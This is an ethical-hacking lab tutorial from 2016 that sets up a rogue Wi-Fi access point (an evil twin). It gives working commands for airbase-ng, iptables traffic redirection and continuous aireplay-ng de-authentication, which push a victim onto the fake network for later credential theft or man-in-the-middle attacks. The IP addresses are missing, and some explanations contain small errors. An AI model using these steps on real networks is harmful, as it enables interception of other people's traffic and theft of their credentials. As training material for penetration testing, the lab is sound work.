Lab: Wi-Fi Security

Satyam Singh
February 29, 2016 by
Satyam Singh


This lab comprises steps to set up a testing environment, create a rogue wireless access point, assign the internet connection to the rogue access point and force the victim to connect to the rogue access point.

Things Required:

1. Wireless Adapter: Wireless adapter is required for packet sniffing and injection. It is easily available at Amazon.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

2. Backtrack OS or Kali Linux: They are the Linux distributions and contain a lot of tools for pen testing.

3. A wireless Network: Make sure the user has access and control to one wireless access point. This exercise must not be practiced on other's access point.

4. A target machine: This machine can be your local machine or a VM image. You can use Windows 7 VM image for this lab.

Exercise: Setting up a rogue access point.

Step 1: Launch the VMware Workstation and load the VM image of Kali Linux. Click on the "Edit virtual machine settings" link, go to "Network Adapter" section and select "Bridged" option under "Network connection" box.

Step 2: Launch Kali Linux and log in as the root user. The default username and password are root and toor, respectively.

Step 3: Connect the wireless adapter to the laptop. The user should be able to see the wireless adapter under Removable Devices option with a blue tick mark. If tick mark is not present then, select the wireless adapter and select Connect. This will disconnect the wireless adapter from the Windows OS and connect to Kali. This is shown in the screenshot below.

Step 4: Launch a new terminal and enter the following command to check the IP address of the gateway.

route -n

In our case, the gateway is

Step 5: To get the list of the network interface, type the following command, as shown in the following screenshot.


We have got one interface with name wlan5. This may differ from machine to machine.

Step 6: Check what all access points are available near the user. Run the following command, as shown in the following screenshots.

airodump-ng wlan5

This will start capturing the traffic and start showing the list of available access points near the user along with BSSID (MAC address of the access point) and Channel of the access points.

Take a note of values under PWR column. The nearest router will have the least value.

Step 7: Note down the value of BSSID and Channel number of the access point that the user is interested in. Also, note down the MAC address of the target device.

In our case, the BSSID value is 5E:F9:6A:29:28:18, Channel is 2 and target machine's MAC id is

Step 8: We have to set up a DHCP server to provide the internet to the fake access point. Use the following command to install a DHCP server in Kali:

apt-get install isc-dhcp-server

After installation, use the following command to change the content of the dhcpd.conf file as given below.

leafpad /etc/dhcpd.conf


default-lease-time 600;

max-lease-time 7200;

subnet netmask {

option routers;

option subnet-mask;

option domain-name "Epson_Printer";

option domain-name-servers;



Save and close the file.

Repeat the above step for /etc/dhcpd/dhcpd.conf file as well.

Step 9: Open a new terminal and use the following command to create a new access point with ESSID similar to our victim access point i.e. "Epson_Printer".

airbase-ng --e Epson_Printer -c 2 wlan5

  • e is ESSID (MAC address) of the access point.
  • c is a channel for the wireless network.
  • wlan5 is the interface name.

The new access point with name "Epson_Printer" is created now.

Step 10: Now we will open a new terminal and monitor the traffic on the newly created access point with the following command:

airodump-ng --bssid 00:C0:CA:70:8F:25 -C 2 wlan 5

Step 11: Check the command window of step number 5. The newly created access point should be visible now.

Step 12: Now, we have to provide the internet to the fake access point. Open a new terminal and execute the following set of commands one after another.

  • ifconfig at0 netmask
  • ifconfig at0 mtu 1400
  • route add -net netmask gw
  • iptables --flush
  • iptables --table nat --flush
  • iptables --delete-chain
  • iptables --table nat --delete-chain
  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -A PREROUTING -p udp -j DNAT --to
  • iptables -P FORWARD ACCEPT
  • iptables --append FORWARD --in-interface at0 -j ACCEPT
  • iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  • dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
  • /etc/init.d/isc-dhcp-server start

Step 13: Either we can wait for someone to connect to this fake access point or we can forcefully de-authenticate our connected target so that it will try to reconnect to the access point.

We can use the following command to send the de-authentication packets:

aireplay-ng --deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5

  • 5E:F9:6A:29:28:18 is the MAC address of the access point.
  • 0 is de-authentication.
  • -c is the MAC address of the target machine.
  • wlan5 is the interface name.

The following screenshot shows that the wireless adapter is sending the de-authentication packet to the given access point. The target machine is disconnected with the "Epson_Printer" access point and trying to reconnect again, as shown in the following screenshot.

Step 14: Due to continuous deauth packets, the client is not able to reconnect to the original access point and automatically tries connecting to the fake access point which has stronger signal strength. This connection can be seen in the terminal open in step number 7.

Step 15: Check the airodump-ng command window running in the background. The connection of a device can be seen in the terminal open in step number 8 as well.

Become a Certified Ethical Hacker, guaranteed!

Become a Certified Ethical Hacker, guaranteed!

Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.

The victim device is connected to the fake access point now. From here an attacker can perform various attacks such as DNS spoofing to redirect the connected victim to the fake website and grab the credentials or using sslstrip and ettercap to perform MiTM (Man in The Middle) attack.

Satyam Singh
Satyam Singh

Satyam is an Informational Security Professional, currently working as a Tech Specialist and Team Lead at Paladion Networks. He has 5.5 years of practical experience in this domain, with the main area of interest in Web and Mobile Application, Network Penetration Testing, Vulnerability Assessment and Infrastructure Security.